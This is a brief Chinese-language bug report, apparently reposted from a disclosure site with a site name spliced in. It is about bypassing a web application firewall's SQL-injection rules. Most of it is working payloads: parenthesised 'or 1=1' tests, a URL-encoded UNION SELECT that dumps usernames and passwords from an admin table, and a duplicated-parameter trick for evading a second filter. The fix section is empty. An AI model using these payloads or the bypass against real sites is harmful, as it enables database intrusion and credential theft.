在某些web环境下,涛涛电脑知识网,安全宝对防范sql的部分防护规则可被绕过,继续注入...
?id=(-575) or 1=1
简单加个括号
?id=%28-575%29%20%20or%281%29=%281%29
因此构造
?id=%28-575%29UNION%20%28SELECT%201,username,3,4,passwd,6,7,8,9,10,11,12,13,14,15,16,17&id=%2818%29from%28admin%29%29
之所以使用复参 是为了绕过智创那个防护
标准的也没有拦截
修复方案:
你懂的 ,涛涛电脑知识网